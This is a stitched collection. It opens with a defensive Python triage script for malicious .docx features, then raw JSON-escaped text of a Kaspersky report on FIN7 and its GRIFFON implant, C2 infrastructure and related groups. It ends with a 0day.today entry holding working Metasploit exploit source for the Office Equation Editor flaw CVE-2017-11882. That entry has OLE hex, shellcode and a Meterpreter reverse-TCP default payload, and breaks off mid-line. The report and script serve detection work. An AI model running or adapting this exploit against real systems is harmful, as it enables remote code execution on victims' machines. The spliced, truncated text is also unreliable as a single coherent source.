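A triage script for the two document features above (an INCLUDEPICTURE field pointing at a remote resource, and builder-generated Author/Company metadata), as an added example that is not code from Kaspersky or from the FIN7 toolset. It reads the .docx package directly with the standard library, joins field instructions that Word splits across several runs, and applies a simple heuristic for the metadata fingerprint shown in the IOC tables that follow. The sample document is constructed in memory; the only value taken from this article is the metadata string from the first IOC row.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
DC = "http://purl.org/dc/elements/1.1/"
EP = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"

# INCLUDEPICTURE whose target lives outside the package (HTTP, file:// or UNC).
REMOTE_PICTURE = re.compile(r'INCLUDEPICTURE\s+"?((?:https?://|file://|\\\\)[^"\s]+)', re.I)


def field_instructions(document_xml: bytes) -> list:
    """Return every field instruction in word/document.xml as one string.
    Word splits a field over several w:instrText runs between fldChar
    begin/end markers, so the runs are joined per field; w:fldSimple
    carries its instruction in an attribute instead."""
    root = ET.fromstring(document_xml)
    fields, current, depth = [], [], 0
    for el in root.iter():
        if el.tag == f"{{{W}}}fldSimple":
            fields.append(el.get(f"{{{W}}}instr", ""))
        elif el.tag == f"{{{W}}}fldChar":
            kind = el.get(f"{{{W}}}fldCharType")
            if kind == "begin":
                depth += 1
                if depth == 1:
                    current = []
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:
                    fields.append("".join(current))
        elif el.tag == f"{{{W}}}instrText" and depth > 0:
            current.append(el.text or "")
    return fields


def remote_includepictures(fields) -> list:
    return [m.group(1) for f in fields for m in [REMOTE_PICTURE.search(f)] if m]


def builder_like_metadata(author: str, company: str) -> bool:
    """Heuristic for the builder fingerprint in the IOC tables: Author and
    Company are the same random-looking lowercase string."""
    return bool(author) and author == company and re.fullmatch(r"[a-z]{8,}", author) is not None


def _prop(z: zipfile.ZipFile, member: str, tag: str) -> str:
    if member not in z.namelist():
        return ""
    el = ET.fromstring(z.read(member)).find(tag)
    return (el.text or "").strip() if el is not None else ""


def triage_docx(data: bytes) -> dict:
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        doc = z.read("word/document.xml") if "word/document.xml" in z.namelist() else b"<x/>"
        author = _prop(z, "docProps/core.xml", f"{{{DC}}}creator")
        company = _prop(z, "docProps/app.xml", f"{{{EP}}}Company")
    return {
        "remote_pictures": remote_includepictures(field_instructions(doc)),
        "author": author,
        "company": company,
        "builder_like_metadata": builder_like_metadata(author, company),
    }


def build_sample_docx() -> bytes:
    """Constructed minimal .docx (NOT a FIN7 sample): one INCLUDEPICTURE field
    split over two runs that fetches a remote image, plus Author/Company taken
    from the first row of the IOC table in the article."""
    document = (
        f'<w:document xmlns:w="{W}"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE </w:instrText></w:r>'
        '<w:r><w:instrText xml:space="preserve">"http://tracker.example/p.png" \\d</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>'
    )
    core = ('<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/'
            f'metadata/core-properties" xmlns:dc="{DC}"><dc:creator>mogjxjtvte</dc:creator>'
            '</cp:coreProperties>')
    app = f'<Properties xmlns="{EP}"><Company>mogjxjtvte</Company></Properties>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", document)
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", app)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_docx(build_sample_docx()))
```

The password-protected variant is out of reach of this script by design: an encrypted Office file is an OLE container, not a zip, so the first triage step there is to notice the encryption itself and try the trivial passwords the article mentions before anything else.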
Moreover, the builder allows them to modify different IOCs, such as the filenames of the wscript.exe or sctasks.exe copies, etc.\n\n**wscript.exe copy** | **sctasks copy** | **Task name** | **C2** \n---|---|---|--- \nbyzNne10.exe | byzNne17.exe | TaskbyzNne | logitech-cdn[.]com \nc9FGG10.exe | c9FGG17.exe | Taskc9FGG | logitech-cdn[.]com \nzEsb10.exe | zEsb17.exe | TaskzEsb | servicebing-cdn[.]com \n \nIOCs extracted from documents that use sctasks for GRIFFON persistence\n\n**Author** | **Company** | **wscript.exe copy** | **C2** \n---|---|---|--- \nmogjxjtvte | mogjxjtvte | mswmex44.exe | logitech-cdn[.]com \nsoxvremvge | soxvremvge | c9FGG10.exe | logitech-cdn[.]com \ngareljtjhvd | gareljtjhvd | zEsb10.exe | servicebing-cdn[.]com \n \nIOCs extracted from regular documents associated with GRIFFON\n\n### **GRIFFON Implant**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144433/sas-fin-7-1.png>)\n\n_Griffon Malware attack pattern_\n\nThe GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism. The malware is designed to receive modules that are executed in memory and to send the results to C2s. We were able to obtain four different modules during the investigation.\n\n#### **Reconnaissance module**\n\nThe first module downloaded by the GRIFFON malware to the victim's computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to collect results, which are then sent back to the operators. 
Interestingly, more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage, from the operating system installation date and time and Windows domain membership to a list of the workstation's monitors and their resolutions.\n\n#### **Meterpreter downloader**\n\nThe second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as \"_Tinymet_\". This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (e.g. with the key 0x50 or 0x51) piece of Meterpreter shellcode to execute.\n\n#### **Screenshot module**\n\nThe third module allows the operators to take a screenshot of the remote system. To do that, it also drops a PowerShell script on the workstation to execute. The script executes an open-source .NET class used for taking a screenshot. The resulting screenshot is saved at \"%TMP%/image.png\", sent back to the attackers by the GRIFFON implant and then deleted.\n\n#### **Persistence module**\n\nThe last retrieved module is a persistence module. If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim's workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. The attackers use a PowerLinks-style method to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the \"file-less\" aspect of this method.\n\nThrough its lightweight and modular architecture, the GRIFFON implant is the perfect validator. Even though we have been able to retrieve four different modules, it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim's workstation.\n\n## **On the hunt for GRIFFON infrastructure**\n\nAttackers make mistakes, and FIN7 is no exception. 
A major error made by its operators allowed us to track the command and control servers of the GRIFFON implant last year. In order to trick blue teams and other DFIR analysts, the operators configured fake HTTP 302 redirections to various Google services on their C2 servers.\n \n \n HTTP/1.1 302 Found\n Server: nginx\n Date: [retracted]\n Content-Type: text/html; charset=UTF-8\n Content-Length: 0\n Connection: keep-alive\n Location: https://cloud.google.com/cdn/\n\n**Returned headers for most of the GRIFFON C2 servers on port 443**\n\nThis error allowed us to follow the infrastructure week by week, until an individual posted the heuristic for tracking their C2s on Twitter at the end of December 2018. A few days after the tweet, in January 2019, the operators changed their landing page in order to prevent this type of tracking of their infrastructure.\n\n### **Fake pentest company**\n\nDuring the investigation related to the GRIFFON infrastructure, we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company.\n\nAccording to the website, that domain supposedly belongs to a legitimate security company \"fully owned by the Russian Government\" (sic) with offices in \"Moscow, Saint Petersburg and Yekaterinburg\", but the address says the company is located in Trump Tower, in New York. Given FIN7's previous use of false security companies, we decided to look deeper into this one.\n\nAs we were looking at the content of the website, it became evident that almost all of the text used was lifted from legitimate security-company websites. 
Phrases and sentences were borrowed from at least the following companies/sites:\n\n * DKSec \u2013 www.dksec.com\n * OKIOK \u2013 www.okiok.com/services/tailored-solutions\n * MainNerve \u2013 www.mainnerve.com\n * Datics \u2013 www.datatics.com/cyber-security\n * Perspective Risk \u2013 www.perspectiverisk.com\n * Synack \u2013 https://www.synack.com/company\n * FireEye \u2013 https://www.fireeye.com/services/penetration-testing.html\n\nThis company seems to have been used by the FIN7 threat actor to hire new people as translators, developers and pentesters. During our research, we found various job advertisements associated with the company on freelance and remote-work websites.\n\nIn addition to that, various individuals have mentioned the company in their resumes. We believe that some of these individuals may not even be aware that they are working for a cybercrime business.\n\n## **Links to other intrusion sets**\n\nWhile tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019, we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set. The link between these threat actors and FIN7 is still weak, but we decided to disclose a few hints regarding them in this blog post.\n\n### **CobaltGoblin/EmpireMonkey**\n\nOver its history, FIN7 has overlapped several times with Cobalt/EmpireMonkey in terms of TTPs. This activity cluster, which Kaspersky Lab has followed for a few years, uses various implants to target mainly banks and developers of banking and money-processing software. At the end of 2018, the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims' networks. 
After a successful penetration, it uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network, where it can monetize its access.\n\nFIN7's last campaigns were targeting banks in Europe and Central America. This threat actor is [suspected of stealing](<https://www.timesofmalta.com/articles/view/20190225/local/how-bov-hackers-got-away-with-13-million.702800>) \u20ac13 million from Bank of Valletta, Malta, earlier this year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07150038/sas-fin-7-2.png>)\n\nExample of malicious documents used from the end of 2018 to the beginning of 2019\n\nA few interesting overlaps between the recent FIN7 and EmpireMonkey campaigns:\n\n * Both used macros to copy wscript.exe to another file whose name began with \"ms\" (mses.exe \u2013 FIN7, msutil.exe \u2013 EmpireMonkey).\n * Both executed a JScript file named \"error\" in %TEMP% (Errors.txt in the case of FIN7, Errors.bat for EmpireMonkey).\n * Both used DocuSign decoy documents with different macros. The macros popped the same \"Document decryption error\" message, even though the macro code is completely different.\n\nWe have a high level of confidence in a historic association between FIN7 and Cobalt, even though we believe that these two clusters of activity are operated by different teams.\n\n### **AveMaria**\n\nAveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. 
Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.\n\nTo deliver their malware, the cybercriminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882, or documents with Ole2Link and SCT. They also use AutoIT droppers, password-protected EXE files and even ISO images. Interestingly, in some emails they ask targets to phone them if they have any questions, as the FIN7 operators do.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144536/sas-fin-7-4.png>)\n\nExample of an AveMaria spearphishing email. The criminals suggest calling them.\n\nDuring the investigation into FIN7, our threat-hunting systems found an interesting overlap between the infrastructure of FIN7 and AveMaria: two servers in the same IP range and autonomous system (AS14576) share a non-standard SSH port, 222. One of the servers is a Griffon C2, and the other one, an AveMaria C2.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144550/sas-fin-7-5.png>)\n\nDistribution of targets is another factor suggesting that these two malware families may be connected. We analyzed AveMaria targets during February and March of 2019. The spearphishing emails were sent only to various kinds of businesses and did not target individuals. Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players, and 21% were various types of manufacturing companies. We also spotted several typical FIN7 targets, such as retailers and hotels. 
Most AveMaria targets (72%) were in the EU.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144612/sas-fin-7-6.png>)\n\n### **CopyPaste**\n\nAt the end of 2018, while searching for new FIN7 campaigns via telemetry, we discovered a set of activity from a previously unknown APT that we temporarily called \"CopyPaste\". Interestingly, this actor targeted financial entities and companies in one African country, which led us to think that CopyPaste was associated with cybermercenaries or a training center.\n\nThis set of activity relied on open-source tools, such as Powershell Empire, and well-documented red teaming techniques, in order to get a foothold within the victims' networks and avoid detection.\n\nHere are the main similarities between CopyPaste and FIN7:\n\n * Both used the same Microsoft PowerShell argument obfuscation order: \"powershell.exe -NoP -NonI -ExecutionPolicy Bypass\". We have only seen FIN7 and CopyPaste use this argument list for executing their malicious PowerShell scripts.\n * Both used decoy 302 HTTP redirections and typosquatting on their C2s (reminiscent of Cobalt and FIN7). The Empire C2s associated with CopyPaste had decoy redirections to Digicert and Microsoft websites, and used decoy job and tax websites with decoy redirections to host their payloads. FIN7 and Cobalt also used decoy 302 HTTP redirections: FIN7 on its GRIFFON C2s before January 2018, and Cobalt on its staging servers, similarly to CopyPaste.\n * Quite recently, FIN7 threat actors typosquatted the brand \"Digicert\" using the domain name digicert-cdn[.]com, which is used as a command and control server for their GRIFFON implants. CopyPaste, in turn, also typosquatted this brand with their domains digicertweb[.]com and digi-cert[.]org, both used as a Powershell Empire C2 with decoy HTTP 302 redirects to the legitimate Digicert website.\n\nThe links between CopyPaste and FIN7 are still very weak. 
It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7.\n\n## **Conclusions**\n\nDuring 2018, Europol and the DoJ announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. It was believed that the arrest of the group leader would have an impact on the group's operations. However, recent data seems to indicate that the attacks have continued without significant setbacks. One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella. We observe, with various levels of confidence, that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.\n\nThe first of them is the well-known FIN7, which specializes in attacking various companies to get access to financial data or PoS infrastructure. They rely on a Griffon JS backdoor and Cobalt/Meterpreter, and in recent attacks, Powershell Empire. The second one is CobaltGoblin/Carbanak/EmpireMonkey, which uses the same toolkit and techniques and similar infrastructure, but targets only financial institutions and associated software/services providers.\n\nWe link the AveMaria botnet to these two groups with medium confidence: AveMaria's targets are mostly suppliers for big companies, and the way AveMaria manages its infrastructure is very similar to FIN7's. The last piece is the newly discovered CopyPaste group, who targeted financial entities and companies in one African country, which led us to think that CopyPaste was associated with cybermercenaries or a training center. The links between CopyPaste and FIN7 are still very weak. It is possible that the operators of this cluster of activity were influenced by open-source publications and do not have any ties with FIN7.\n\nAll of the aforementioned groups greatly benefit from unpatched systems in corporate environments. 
They thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework. So far, the groups have not used any zero-days.\n\nFIN7/Cobalt phishing documents may seem basic, but when combined with their extensive social engineering and focused targeting, they are quite successful. As with their previous fake company \"Combi Security\", we are confident that they continue to create new personas for use in either targeting or recruiting under a \"new\" brand, \"IPC\".\n\nMore information about these and related attacks is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com\n\n## **Indicators of compromise**\n\n_In order to preserve the privacy of the potential victims, we stripped the targeted entities from the domain names._", "modified": "2019-05-08T10:00:04", "published": "2019-05-08T10:00:04", "id": "SECURELIST:163368D119719D834280EA969EDB785D", "href": "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", "type": "securelist", "title": "FIN7.5: the infamous cybercrime rig \u201cFIN7\u201d continues its activities", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-09T21:28:48", "description": "This Metasploit module exploits a flaw in how the Equation Editor handles OLE objects in memory to execute arbitrary code using RTF files without interaction.", "edition": 1, "published": "2017-12-06T00:00:00", "type": "zdt", "title": "Microsoft Office Equation Editor Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "2017-12-06T00:00:00", "href": "https://0day.today/exploit/description/29119", "id": "1337DAY-ID-29119", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FILEFORMAT\r\n\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Office CVE-2017-11882',\r\n 'Description' => %q{\r\n Module exploits a flaw in how the Equation Editor 
that\r\n allows an attacker to execute arbitrary code in RTF files without\r\n interaction. The vulnerability is caused by the Equation Editor,\r\n to which fails to properly handle OLE objects in memory.\r\n },\r\n 'Author' => ['mumbai', 'embedi'],\r\n 'License' => MSF_LICENSE,\r\n 'DisclosureDate' => 'Nov 15 2017',\r\n 'References' => [\r\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\r\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' => [\r\n ['Microsoft Office', {} ],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Payload' => {\r\n 'DisableNops' => true\r\n },\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\r\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\r\n ])\r\n end\r\n\r\n def retrieve_header(filename)\r\n if (not datastore['FOLDER_PATH'].nil?)\r\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\r\n else\r\n path = nil\r\n end\r\n if (not path.nil?)\r\n if ::File.file?(path)\r\n File.open(path, 'rb') do |fd|\r\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\r\n header = header.to_s # otherwise I get nil class...\r\n print_status(\"Injecting #{path}...\")\r\n return header\r\n end\r\n else\r\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\r\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\r\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\r\n end\r\n else\r\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\r\n header << '{\\*\\generator Riched20 
6.3.9600}\\viewkind4\\uc1' + \"\\n\"\r\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\r\n end\r\n return header\r\n end\r\n\r\n\r\n\r\n def generate_rtf\r\n header = retrieve_header(datastore['FILENAME'])\r\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\r\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\r\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\r\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\r\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\r\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\r\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\r\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\r\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\r\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << 
'000000000000001400000000000000010043006f006d0070004f0062006a00000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\r\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\r\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 
'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\r\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\r\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\r\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\r\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\r\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\r\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\r\n\r\n\r\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\r\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\r\n shellcode << \"\\x9e\" # 6: 9e sahf\r\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\r\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\r\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\r\n shellcode << \"\\\\\" # 12: 5c pop esp\r\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\r\n shellcode << \"\\xee\" # 15: ee out dx,al\r\n shellcode << \"[\" # 16: 5b pop ebx\r\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\r\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\r\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\r\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\r\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\r\n shellcode << 
\"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\r\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\r\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\r\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\r\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\r\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\r\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\r\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\r\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\r\n shellcode << \"\\x53\" # 3e: 53 push ebx\r\n shellcode << \"\\x51\" # 3f: 51 push ecx\r\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\r\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\r\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\r\n shellcode << \"\\x53\" # 49: 53 push ebx\r\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\r\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\r\n shellcode << \"\\x90\" # 50: 90 nop\r\n shellcode << \"\\x90\" # 50: 90 nop\r\n\r\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\r\n footer << '00000000000000000000000000000000000000000000000000000'\r\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\r\n footer << '0000C5000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\r\n footer << '000000000000000000000000000000000000000000000000000000'\r\n footer << 
'0000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '000000000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\r\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\r\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\r\n footer << '00000000000000001050000050000000D0000004D45544146494C'\r\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\r\n footer << '500000002001C0000000000050000000902000000000500000002'\r\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\r\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\r\n footer << 